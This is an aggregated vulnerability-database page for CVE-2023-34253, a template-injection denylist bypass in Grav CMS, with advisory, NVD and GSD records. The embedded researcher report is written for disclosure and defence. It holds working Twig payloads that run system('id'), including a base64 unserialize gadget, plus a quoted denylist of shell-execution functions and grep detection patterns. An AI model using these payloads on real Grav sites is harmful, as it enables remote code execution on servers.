1. CVE-2023-30592 Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in Utils::isDangerousFunction() and to achieve remote code execution via usage of unsafe functions, such as unserialize(), that are not blocked. This is a bypass of CVE-2022-2073. 2. CVE-2023-30593 Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in Utils::isDangerousFunction() and to achieve remote code execution via usage of capitalised names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073. 3. CVE-2023-30594 Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in Utils::isDangerousFunction() and to achieve remote code execution via usage of fully-qualified names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.42"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-34253"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-16T19:36:52Z",
    "nvd_published_at": "2023-06-14T23:15:11Z",
    "severity": "HIGH"
  },
  "details": "Hi, \n\nactually we have sent the bug report to security@getgrav.org on 27th March 2023 and on 10th April 2023.\n\n# Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability\n\n## Summary:  \n| **Product**             | Grav CMS                                      |\n| ----------------------- | --------------------------------------------- |\n| **Vendor**              | Grav                                          |\n| **Severity**            | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |\n| **Affected Versions**   | \u003c= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) |\n| **Tested Versions**     | v1.7.40                                       |\n| **Internal Identifier** | STAR-2023-0006                                |\n| **CVE Identifier**      | Reserved CVE-2023-30592, CVE-2023-30593, CVE-2023-30594                                           |\n| **CWE(s)**              | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |\n\n## CVSS3.1 Scoring System:  \n**Base Score:** 7.2 (High)  \n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`  \n| **Metric**                   | **Value** |\n| ---------------------------- | --------- |\n| **Attack Vector (AV)**       | Network   |\n| **Attack Complexity (AC)**   | Low       |\n| **Privileges Required (PR)** | High      |\n| **User Interaction (UI)**    | None      |\n| **Scope (S)**                | Unchanged |\n| **Confidentiality \\(C)**     | High      |\n| **Integrity (I)**            | High      |\n| **Availability (A)**         | High      |\n\n## Product Overview:  \nGrav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.\n\n## Vulnerability Summary:  \nThe denylist introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.\n\n## Vulnerability Details:  \nIn addressing [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/), a denylist was introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to validate and ensure that dangerous functions could not be executed via injection of malicious templates.\n\nThe implementation of the denylist can be found in `Utils::isDangerousFunction()` within [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190):\n~~~php\n    /**\n     * @param string $name\n     * @return bool\n     */\n    public static function isDangerousFunction(string $name): bool\n    {\n        static $commandExecutionFunctions = [\n            \u0027exec\u0027,\n            \u0027passthru\u0027,\n            \u0027system\u0027,\n            \u0027shell_exec\u0027,\n            \u0027popen\u0027,\n            \u0027proc_open\u0027,\n            \u0027pcntl_exec\u0027,\n        ];\n\n        static $codeExecutionFunctions = [\n            \u0027assert\u0027,\n            \u0027preg_replace\u0027,\n            \u0027create_function\u0027,\n            \u0027include\u0027,\n            \u0027include_once\u0027,\n            \u0027require\u0027,\n            \u0027require_once\u0027\n        ];\n\n        static $callbackFunctions = [\n            \u0027ob_start\u0027 =\u003e 0,\n            \u0027array_diff_uassoc\u0027 =\u003e -1,\n            \u0027array_diff_ukey\u0027 =\u003e -1,\n            \u0027array_filter\u0027 =\u003e 1,\n            \u0027array_intersect_uassoc\u0027 =\u003e -1,\n            \u0027array_intersect_ukey\u0027 =\u003e -1,\n            \u0027array_map\u0027 =\u003e 0,\n            \u0027array_reduce\u0027 =\u003e 1,\n            \u0027array_udiff_assoc\u0027 =\u003e -1,\n            \u0027array_udiff_uassoc\u0027 =\u003e [-1, -2],\n            \u0027array_udiff\u0027 =\u003e -1,\n            \u0027array_uintersect_assoc\u0027 =\u003e -1,\n            \u0027array_uintersect_uassoc\u0027 =\u003e [-1, -2],\n            \u0027array_uintersect\u0027 =\u003e -1,\n            \u0027array_walk_recursive\u0027 =\u003e 1,\n            \u0027array_walk\u0027 =\u003e 1,\n            \u0027assert_options\u0027 =\u003e 1,\n            \u0027uasort\u0027 =\u003e 1,\n            \u0027uksort\u0027 =\u003e 1,\n            \u0027usort\u0027 =\u003e 1,\n            \u0027preg_replace_callback\u0027 =\u003e 1,\n            \u0027spl_autoload_register\u0027 =\u003e 0,\n            \u0027iterator_apply\u0027 =\u003e 1,\n            \u0027call_user_func\u0027 =\u003e 0,\n            \u0027call_user_func_array\u0027 =\u003e 0,\n            \u0027register_shutdown_function\u0027 =\u003e 0,\n            \u0027register_tick_function\u0027 =\u003e 0,\n            \u0027set_error_handler\u0027 =\u003e 0,\n            \u0027set_exception_handler\u0027 =\u003e 0,\n            \u0027session_set_save_handler\u0027 =\u003e [0, 1, 2, 3, 4, 5],\n            \u0027sqlite_create_aggregate\u0027 =\u003e [2, 3],\n            \u0027sqlite_create_function\u0027 =\u003e 2,\n        ];\n\n        static $informationDiscosureFunctions = [\n            \u0027phpinfo\u0027,\n            \u0027posix_mkfifo\u0027,\n            \u0027posix_getlogin\u0027,\n            \u0027posix_ttyname\u0027,\n            \u0027getenv\u0027,\n            \u0027get_current_user\u0027,\n            \u0027proc_get_status\u0027,\n            \u0027get_cfg_var\u0027,\n            \u0027disk_free_space\u0027,\n            \u0027disk_total_space\u0027,\n            \u0027diskfreespace\u0027,\n            \u0027getcwd\u0027,\n            \u0027getlastmo\u0027,\n            \u0027getmygid\u0027,\n            \u0027getmyinode\u0027,\n            \u0027getmypid\u0027,\n            \u0027getmyuid\u0027\n        ];\n\n        static $otherFunctions = [\n            \u0027extract\u0027,\n            \u0027parse_str\u0027,\n            \u0027putenv\u0027,\n            \u0027ini_set\u0027,\n            \u0027mail\u0027,\n            \u0027header\u0027,\n            \u0027proc_nice\u0027,\n            \u0027proc_terminate\u0027,\n            \u0027proc_close\u0027,\n            \u0027pfsockopen\u0027,\n            \u0027fsockopen\u0027,\n            \u0027apache_child_terminate\u0027,\n            \u0027posix_kill\u0027,\n            \u0027posix_mkfifo\u0027,\n            \u0027posix_setpgid\u0027,\n            \u0027posix_setsid\u0027,\n            \u0027posix_setuid\u0027,\n        ];\n\n        if (in_array($name, $commandExecutionFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $codeExecutionFunctions)) {\n            return true;\n        }\n\n        if (isset($callbackFunctions[$name])) {\n            return true;\n        }\n\n        if (in_array($name, $informationDiscosureFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $otherFunctions)) {\n            return true;\n        }\n\n        return static::isFilesystemFunction($name);\n    }\n\n    /**\n     * @param string $name\n     * @return bool\n     */\n    public static function isFilesystemFunction(string $name): bool\n    {\n        static $fileWriteFunctions = [\n            \u0027fopen\u0027,\n            \u0027tmpfile\u0027,\n            \u0027bzopen\u0027,\n            \u0027gzopen\u0027,\n            // write to filesystem (partially in combination with reading)\n            \u0027chgrp\u0027,\n            \u0027chmod\u0027,\n            \u0027chown\u0027,\n            \u0027copy\u0027,\n            \u0027file_put_contents\u0027,\n            \u0027lchgrp\u0027,\n            \u0027lchown\u0027,\n            \u0027link\u0027,\n            \u0027mkdir\u0027,\n            \u0027move_uploaded_file\u0027,\n            \u0027rename\u0027,\n            \u0027rmdir\u0027,\n            \u0027symlink\u0027,\n            \u0027tempnam\u0027,\n            \u0027touch\u0027,\n            \u0027unlink\u0027,\n            \u0027imagepng\u0027,\n            \u0027imagewbmp\u0027,\n            \u0027image2wbmp\u0027,\n            \u0027imagejpeg\u0027,\n            \u0027imagexbm\u0027,\n            \u0027imagegif\u0027,\n            \u0027imagegd\u0027,\n            \u0027imagegd2\u0027,\n            \u0027iptcembed\u0027,\n            \u0027ftp_get\u0027,\n            \u0027ftp_nb_get\u0027,\n        ];\n\n        static $fileContentFunctions = [\n            \u0027file_get_contents\u0027,\n            \u0027file\u0027,\n            \u0027filegroup\u0027,\n            \u0027fileinode\u0027,\n            \u0027fileowner\u0027,\n            \u0027fileperms\u0027,\n            \u0027glob\u0027,\n            \u0027is_executable\u0027,\n            \u0027is_uploaded_file\u0027,\n            \u0027parse_ini_file\u0027,\n            \u0027readfile\u0027,\n            \u0027readlink\u0027,\n            \u0027realpath\u0027,\n            \u0027gzfile\u0027,\n            \u0027readgzfile\u0027,\n            \u0027stat\u0027,\n            \u0027imagecreatefromgif\u0027,\n            \u0027imagecreatefromjpeg\u0027,\n            \u0027imagecreatefrompng\u0027,\n            \u0027imagecreatefromwbmp\u0027,\n            \u0027imagecreatefromxbm\u0027,\n            \u0027imagecreatefromxpm\u0027,\n            \u0027ftp_put\u0027,\n            \u0027ftp_nb_put\u0027,\n            \u0027hash_update_file\u0027,\n            \u0027highlight_file\u0027,\n            \u0027show_source\u0027,\n            \u0027php_strip_whitespace\u0027,\n        ];\n\n        static $filesystemFunctions = [\n            // read from filesystem\n            \u0027file_exists\u0027,\n            \u0027fileatime\u0027,\n            \u0027filectime\u0027,\n            \u0027filemtime\u0027,\n            \u0027filesize\u0027,\n            \u0027filetype\u0027,\n            \u0027is_dir\u0027,\n            \u0027is_file\u0027,\n            \u0027is_link\u0027,\n            \u0027is_readable\u0027,\n            \u0027is_writable\u0027,\n            \u0027is_writeable\u0027,\n            \u0027linkinfo\u0027,\n            \u0027lstat\u0027,\n            //\u0027pathinfo\u0027,\n            \u0027getimagesize\u0027,\n            \u0027exif_read_data\u0027,\n            \u0027read_exif_data\u0027,\n            \u0027exif_thumbnail\u0027,\n            \u0027exif_imagetype\u0027,\n            \u0027hash_file\u0027,\n            \u0027hash_hmac_file\u0027,\n            \u0027md5_file\u0027,\n            \u0027sha1_file\u0027,\n            \u0027get_meta_tags\u0027,\n        ];\n\n        if (in_array($name, $fileWriteFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $fileContentFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $filesystemFunctions)) {\n            return true;\n        }\n\n        return false;\n    }\n~~~\n\nThe list of banned functions appears to be adapted from a [StackOverflow post](https://stackoverflow.com/a/3697776). While the denylist looks rather comprehensive, there are actually multiple issues with the denylist implementation:\n1. There may be unsafe functions, be it built-in to PHP or user-defined, which are not be blocked. For example, `unserialize()` and aliases of blocked functions, such as `ini_alter()`, are not being included in the denylist.  \n2. A case-sensitive comparison is performed against the denylist, but PHP function names are case-insensitive. This allows using `filter(\u0027SYSTEM\u0027)` to trivially bypass the denylist validation check.  \n3. Fully qualified names can be used when referencing functions, allowing `filter(\u0027\\system\u0027)` to trivially bypass the denylist validation checks.  \n\n## Exploit Conditions:    \nThis vulnerability can be exploited if the attacker has access to:\n1. an administrator account, or\n2. a non-administrative user account with the following permissions granted:\n    - login access to Grav admin panel, and\n    - page creation or update rights\n\n## Reproduction Steps:  \n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts \u003e Add`, and ensure that the following permissions are assigned when creating a new low-privileged user:\n    * Login to Admin - Allowed\n    * Page Update - Allowed\n3. Log out of Grav Admin, and log back in using the account created in step 2.\n4. Navigate to `http://\u003cgrav_installation\u003e/admin/pages/home`.\n5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n6. Under the `Content` tab, insert the following payload within the editor:\n   ~~~twig\n   // Method 1: Using unserialize() to trigger system(\u0027id\u0027) call\n   // Serialized payloaed generated using the phpggc tool: ./phpggc -b Monolog/RCE7 system \u0027id\u0027\n   // {{ \u0027TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aTowO319czoxMzoiACoAcHJvY2Vzc29ycyI7YToyOntpOjA7czozOiJwb3MiO2k6MTtzOjY6InN5c3RlbSI7fX0=\u0027 | base64_decode | array | filter(\u0027unserialize\u0027) }}\n   \n   // Method 2: Trigger system(\u0027id\u0027) via case-insensitive function names\n   {{ [\u0027id\u0027] | filter(\u0027System\u0027) }}\n   \n   // Method 3: Trigger system(\u0027id\u0027) via fully qualified names when referencing functions\n   {{ [\u0027id\u0027] | filter(\u0027\\\\system\u0027) }}\n   ~~~   \n7. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview.\n\n## Suggested Mitigations:  \nIt is recommended to review the list of functions, both default functions in PHP and user-defined functions, and include missing unsafe functions in the denylist. A non-exhaustive list of missing unsafe functions discovered is shown below:\n- `unserialize()`\n- `ini_alter()`\n- `simplexml_load_file()`\n- `simplexml_load_string()`\n- `forward_static_call()`\n- `forward_static_call_array()`\n\nThe `Utils::isDangerousFunction()` function in [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074) should also be patched to disallow usage of fully qualified names when specifying callables, as well as ensure that validation performed on the `$name` parameter is case-insensitive.\n\nFor example,\n~~~diff php\n...\nabstract class Utils\n{\n    ...\n    /**\n     * @param string $name\n     * @return bool\n     */\n    public static function isDangerousFunction(string $name): bool\n    {\n        ...\n+       if ($arrow instanceof Closure) {\n+           return false;\n+       }\n\n+       $name = strtolower($name);\n+       if (strpos($name, \"\\\\\") !== false) {\n+           return false;\n+       }\n\n        if (in_array($name, $commandExecutionFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $codeExecutionFunctions)) {\n            return true;\n        }\n\n        if (isset($callbackFunctions[$name])) {\n            return true;\n        }\n\n        if (in_array($name, $informationDiscosureFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $otherFunctions)) {\n            return true;\n        }\n\n        return static::isFilesystemFunction($name);\n    }\n    ...\n}\n~~~\n\nEnd users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them.\n\n## Detection Guidance:  \nThe following strategies may be used to detect potential exploitation attempts.\n1. Searching within Markdown pages using the following shell command:  \n   `grep -Priz -e \u0027(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(\u0027 /path/to/webroot/user/pages/`\n2. Searching within Doctrine cache data using the following shell command:  \n   `grep -Priz -e \u0027(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(\u0027 --include \u0027*.doctrinecache.data\u0027 /path/to/webroot/cache/`\n3. Searching within Twig cache using the following shell command: \n   `grep -Priz -e \u0027(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|twig_array_(filter|map|reduce))\\s*\\(\u0027 /path/to/webroot/cache/twig/`\n4. Searching within compiled Twig template files using the following shell command:  \n   `grep -Priz -e \u0027(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(\u0027 /path/to/webroot/cache/compiled/files/`\n\nNote that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.\n\n## Credits:  \nNgo Wei Lin ([@Creastery](https://twitter.com/Creastery)) \u0026 Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg))\n\nThe scheduled disclosure date is _**25th July, 2023**_. Disclosure at an earlier date is also possible if agreed upon by all parties.  \n\nKindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:  \n1. **CVE-2023-30592**\n    Server-side Template Injection (SSTI) in getgrav/grav \u003c= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of unsafe functions, such as `unserialize()`, that are not blocked. This is a bypass of CVE-2022-2073.\n2. **CVE-2023-30593**\n    Server-side Template Injection (SSTI) in getgrav/grav \u003c= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of capitalised names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.\n3. **CVE-2023-30594**\n    Server-side Template Injection (SSTI) in getgrav/grav \u003c= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of fully-qualified names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.",
  "id": "GHSA-j3v8-v77f-fvgm",
  "modified": "2023-06-16T19:36:52Z",
  "published": "2023-06-16T19:36:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34253"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"
    },
    {
      "type": "WEB",
      "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability"
}

fkie_cve-2023-34253

Vulnerability from fkie_nvd

Published

2023-06-14 23:15

Modified

2024-11-21 08:06

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190	Issue Tracking
security-advisories@github.com	https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b	Patch
security-advisories@github.com	https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm	Exploit, Vendor Advisory
security-advisories@github.com	https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/	Exploit, Third Party Advisory
security-advisories@github.com	https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190	Issue Tracking
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83	Patch

Impacted products

	Vendor	Product	Version
	getgrav	grav	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "758F84B9-A2EC-45D8-86DD-B309DB02B9AE",
              "versionEndExcluding": "1.7.42",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Grav is a flat-file content management system. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist."
    }
  ],
  "id": "CVE-2023-34253",
  "lastModified": "2024-11-21T08:06:52.047",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-06-14T23:15:11.037",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-184"
        },
        {
          "lang": "en",
          "value": "CWE-1336"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

gsd-2023-34253

Vulnerability from gsd

Modified

2023-12-13 01:20

Details

Grav is a file-based Web platform. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist.

Aliases

CVE-2023-34253

Aliases

CVE-2023-34253

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-34253",
    "id": "GSD-2023-34253"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-34253"
      ],
      "details": "Grav is a file-based Web platform. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist.",
      "id": "GSD-2023-34253",
      "modified": "2023-12-13T01:20:31.160628Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-34253",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "grav",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 1.7.42"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "getgrav"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Grav is a file-based Web platform. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-184",
                "lang": "eng",
                "value": "CWE-184: Incomplete List of Disallowed Inputs"
              }
            ]
          },
          {
            "description": [
              {
                "cweId": "CWE-1336",
